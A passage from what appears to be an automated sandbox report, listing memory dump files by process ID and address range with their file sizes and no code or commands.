                                                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                                                    • memory/3728-135-0x0000000007CE0000-0x0000000007CF4000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      80KB

                                                                                                                                                                                                                                                                                    • memory/3728-137-0x0000000007D20000-0x0000000007D28000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      32KB

                                                                                                                                                                                                                                                                                    • memory/3728-136-0x0000000007D30000-0x0000000007D4A000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                                                                    • memory/3728-134-0x0000000007CC0000-0x0000000007CCE000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                                                                                    • memory/3728-89-0x0000000002F50000-0x0000000002F60000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                    • memory/3728-110-0x000000007F4C0000-0x000000007F4D0000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                    • memory/3728-111-0x0000000007B20000-0x0000000007B52000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      200KB

                                                                                                                                                                                                                                                                                    • memory/3728-113-0x0000000070CB0000-0x0000000071004000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                                    • memory/3728-133-0x0000000007C80000-0x0000000007C91000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      68KB

                                                                                                                                                                                                                                                                                    • memory/3728-132-0x0000000007D80000-0x0000000007E16000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      600KB

                                                                                                                                                                                                                                                                                    • memory/3728-123-0x0000000007B60000-0x0000000007B7E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      120KB

                                                                                                                                                                                                                                                                                    • memory/3728-125-0x0000000007B80000-0x0000000007C23000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      652KB

                                                                                                                                                                                                                                                                                    • memory/3728-126-0x0000000002F50000-0x0000000002F60000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      64KB

                                                                                                                                                                                                                                                                                    • memory/3728-127-0x0000000007C70000-0x0000000007C7A000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      40KB

                                                                                                                                                                                                                                                                                    • memory/3728-112-0x0000000071530000-0x000000007157C000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      304KB

                                                                                                                                                                                                                                                                                    • memory/3728-108-0x0000000007FC0000-0x000000000863A000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      6.5MB

                                                                                                                                                                                                                                                                                    • memory/3728-109-0x0000000007960000-0x000000000797A000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                                                                                    • memory/3728-98-0x0000000005F30000-0x0000000005F96000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                                                                                    • memory/3728-103-0x00000000060F0000-0x0000000006444000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                                                                                    • memory/3728-92-0x0000000005EC0000-0x0000000005F26000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                                                                                    • memory/3728-88-0x00000000057E0000-0x0000000005E08000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      6.2MB

                                                                                                                                                                                                                                                                                    • memory/3728-87-0x0000000073D60000-0x0000000074510000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                                                    • memory/3728-106-0x0000000006B20000-0x0000000006B64000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      272KB

                                                                                                                                                                                                                                                                                    • memory/3728-107-0x00000000076C0000-0x0000000007736000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      472KB

                                                                                                                                                                                                                                                                                    • memory/4128-161-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      972KB

                                                                                                                                                                                                                                                                                    • memory/4128-194-0x0000000000400000-0x0000000002B13000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      39.1MB

                                                                                                                                                                                                                                                                                    • memory/4128-419-0x0000000000400000-0x0000000002B13000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      39.1MB

                                                                                                                                                                                                                                                                                    • memory/4128-293-0x0000000000400000-0x0000000002B13000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      39.1MB

                                                                                                                                                                                                                                                                                    • memory/4128-84-0x0000000000400000-0x0000000002B13000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      39.1MB

                                                                                                                                                                                                                                                                                    • memory/4128-78-0x0000000002D50000-0x0000000002D6C000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      112KB

                                                                                                                                                                                                                                                                                    • memory/4128-197-0x0000000002C10000-0x0000000002D10000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      1024KB

                                                                                                                                                                                                                                                                                    • memory/4128-77-0x0000000002C10000-0x0000000002D10000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      1024KB

                                                                                                                                                                                                                                                                                    • memory/4364-521-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-520-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-514-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-518-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-529-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-530-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-513-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-519-0x00000000017C0000-0x00000000017E0000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      128KB

                                                                                                                                                                                                                                                                                    • memory/4364-512-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-522-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-523-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-517-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-516-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-515-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4364-524-0x0000000140000000-0x0000000140848000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      8.3MB

                                                                                                                                                                                                                                                                                    • memory/4440-0-0x00000000746B0000-0x0000000074E60000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                                                    • memory/4440-61-0x00000000746B0000-0x0000000074E60000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      7.7MB

                                                                                                                                                                                                                                                                                    • memory/4440-1-0x0000000000B70000-0x00000000014B8000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      9.3MB

                                                                                                                                                                                                                                                                                    • memory/4604-504-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                                                                                    • memory/4604-508-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                                                                                    • memory/4604-506-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                                                                                    • memory/4604-505-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                                                                                    • memory/4604-507-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      56KB

                                                                                                                                                                                                                                                                                    • memory/4604-511-0x0000000140000000-0x000000014000E000-memory.dmp

                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                      56KB